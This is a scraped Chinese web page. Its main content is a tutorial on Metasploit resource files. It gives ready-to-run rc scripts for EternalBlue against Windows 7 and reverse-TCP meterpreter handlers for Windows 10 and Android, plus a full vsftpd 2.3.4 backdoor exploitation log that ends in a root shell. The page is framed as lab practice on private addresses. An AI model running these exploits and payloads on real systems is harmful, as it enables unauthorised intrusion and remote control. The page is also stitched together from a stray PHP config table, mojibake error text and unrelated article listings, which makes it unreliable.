| dir_sep                | \                                                                                         |
| php_version            | 5.6.28                                                                                  |
+--------------------+-------------------------------------------------------------------------------------------------------------------------------------+
DESKTOP-9A8VFKB:C:\xampp\htdocs\sec\19 $ autit_filesystem
'autit_filesystem' �����ڲ����ⲿ���Ҳ���ǿ����еij���
���������ļ���


资源文件


最基本的资源文件

#echo version >resource.rc
#echo loadsounds >> version
#echo loadsounds >>resource.rc


# msfconsole -r resource.rc
[*] Processing resource.rc for ERB directives.
resource (resource.rc)> version
Framework: 6.1.27-dev
Console  : 6.1.27-dev
resource (resource.rc)> load sounds
[*] Successfully loaded plugin: sounds
msf6 >


攻击Windows 7资源文件

windows7.rc

use exploit/windows/smb/ms17_010_eternalblue

set rhost 192.168.0.155

run


# msfconsole -r windows7.rc


攻击Windows 10资源文件

Windows 10.rc

se exploit/multi/handler

set lhost 192.168.0.150

set lport 8888

set payload windows/meterpreter/reverse_tcp

run


# msfconsole -r windows10.rc


攻击Android资源文件

android.rc

set lhost 192.168.0.150

set lport 9999

set payload android/meterpreter/reverse_tcp


# msfconsole -r android.rc


渗透Linux

msf6 > use exploit/unix/ftp/vsftpd_234_backdoor
[*] No payload configured, defaulting to cmd/unix/interact
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set payload cmd/unix/interact
payload => cmd/unix/interact
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set rhost 192.168.0.160
rhost => 192.168.0.160
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > run
[*] 192.168.0.160:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 192.168.0.160:21 - USER: 331 Please specify the password.
[+] 192.168.0.160:21 - Backdoor service has been spawned, handling...
[+] 192.168.0.160:21 - UID: uid=0(root) gid=0(root)
[*] Found shell.
[*] Command shell session 1 opened (192.168.0.150:38079 -> 192.168.0.160:6200) at 2022-06-30 17:41:05 +0800
目录
相关文章
|
13天前
|
XML 数据管理 测试技术
深入探索软件自动化测试框架的设计与实现
【4月更文挑战第26天】 随着软件开发周期不断缩短,传统的手动测试方法已难以满足快速迭代的需求。本文聚焦于自动化测试框架的构建与优化,旨在提供一种高效、可维护且可扩展的软件测试解决方案。文章从自动化测试的必要性出发,详细阐述了自动化测试框架设计的核心要素,包括模块化设计、数据驱动测试以及关键词驱动测试等概念。同时,结合实例分析了如何利用流行的测试工具进行框架搭建,并提出了针对常见问题的创新解决方法。最后,通过案例研究展示了该框架在实际项目中的应用效果和潜在改进空间。
|
3天前
|
敏捷开发 测试技术 持续交付
深入探索软件自动化测试的有效性与挑战
【5月更文挑战第25天】本文聚焦于软件自动化测试在现代软件开发周期中的有效性与其面临的挑战。通过对自动化测试的概念、优势及实施过程中可能遇到的问题进行详尽分析,旨在为读者提供一种系统的视角来理解自动化测试的重要性及其在实际应用中的复杂性。文章不仅阐述了自动化测试如何提高测试效率和准确性,还讨论了在不同开发环境中实现自动化的策略和最佳实践,以及如何解决常见的技术和非技术障碍。
|
3天前
|
敏捷开发 存储 数据管理
深入探索软件自动化测试框架的设计与实践
【5月更文挑战第25天】随着软件开发周期不断缩短,传统的手动测试方法已难以满足快速迭代的需求。本文将深入剖析自动化测试框架的设计原则和实践应用,探讨如何通过有效的策略和技术手段提升测试效率和质量。文章首先介绍自动化测试的重要性及其在现代软件开发中的作用,然后详细阐述自动化测试框架的核心组件、结构设计以及关键技术点,最后通过案例分析展示自动化测试框架在实际项目中的应用效果。
|
4天前
|
Java 测试技术 持续交付
深入理解与应用软件自动化测试框架
【5月更文挑战第23天】 随着软件开发周期的不断缩短和发布频率的加快,传统的手动测试方法已难以满足快速迭代的需求。因此,本文将深入探讨自动化测试在现代软件开发中的关键作用,特别是自动化测试框架的设计与实现。文章首先回顾了自动化测试的基本概念和核心优势,接着详细分析了几种流行的自动化测试框架(如Selenium、Appium和JUnit)的特点及应用场景。然后,重点讨论了如何根据项目需求选择适合的测试框架,以及如何构建一个可靠且易于维护的自动化测试环境。最后,通过实际案例分析,展示了自动化测试框架在提高测试效率和确保软件质量方面的实践成效。
|
7天前
|
敏捷开发 存储 测试技术
深入理解软件自动化测试中的数据驱动策略
【5月更文挑战第21天】 在追求高效率和高质量的软件开发过程中,自动化测试已成为不可或缺的一环。本文将探讨数据驱动测试(DDT)策略,一种通过外部数据源来增强测试案例的灵活性和可扩展性的方法。不同于传统的摘要方式,本文将直接介绍关键概念与实施步骤,为读者提供即插即用的知识和技能。
|
8天前
|
敏捷开发 测试技术 持续交付
深入理解软件自动化测试中的数据驱动策略
【5月更文挑战第20天】 在现代软件开发过程中,自动化测试是确保产品质量和持续交付的关键环节。本文将深入探讨数据驱动测试(DDT)策略,这是一种通过外部数据源来增强测试案例的方法,它允许测试人员以参数化的方式执行测试用例,从而增加测试覆盖率并提高测试效率。我们将分析数据驱动测试的核心概念、实施步骤以及面临的挑战,并通过实际案例来展示如何有效地应用DDT以提高软件测试的灵活性和可维护性。
|
10天前
|
运维 测试技术 持续交付
深入探究软件自动化测试中的挑战与解决策略
【5月更文挑战第18天】随着软件开发周期的不断缩短和发布频率的增加,传统的手动测试方法已无法满足快速交付的需求。因此,软件自动化测试成为确保产品质量和加快上市速度的关键工具。然而,自动化测试的实施并非没有挑战。本文将探讨在实施自动化测试过程中常见的问题,如测试用例的设计、维护成本、框架选择和技术更新等,并针对这些问题提出有效的解决策略,以帮助组织提高自动化测试的效率和效果。
|
12天前
|
设计模式 前端开发 测试技术
软件质量的守门人——接口测试
接口作为API,是后端预定义的函数,用于系统间通信和数据交换。接口测试验证不同组件间的交互,确保其准确、可靠。常见应用场景包括集成测试、版本迭代测试、性能测试、安全测试和错误场景测试。随着服务端复杂性的增加,传统测试方法面临挑战,因此引入分层测试(如马丁福勒的测试金字塔模型)和自动化测试,以降低成本并提高效率。接口测试成为确保后端服务质量的关键,学习接口测试可从理解其价值、协议、工具使用及Mock测试等方面逐步进阶。
12 1
|
13天前
|
机器学习/深度学习 人工智能 自然语言处理
深入探索软件自动化测试的未来趋势
【5月更文挑战第12天】 随着软件开发周期的不断缩短和市场需求的快速变化,传统的手动测试方法已经难以满足现代软件质量保证的需求。自动化测试作为一种高效、可靠的解决方案,正逐渐成为行业标配。本文将深入探讨自动化测试的最新发展,分析其在持续集成/持续部署(CI/CD)环境中的作用,以及人工智能(AI)如何重塑测试实践。同时,我们还将展望自动化测试工具和技术的未来演进路径。
|
13天前
|
机器人 测试技术 语音技术
LabVIEW使用软件定义进行汽车电子测试
LabVIEW使用软件定义进行汽车电子测试
18 0

热门文章

最新文章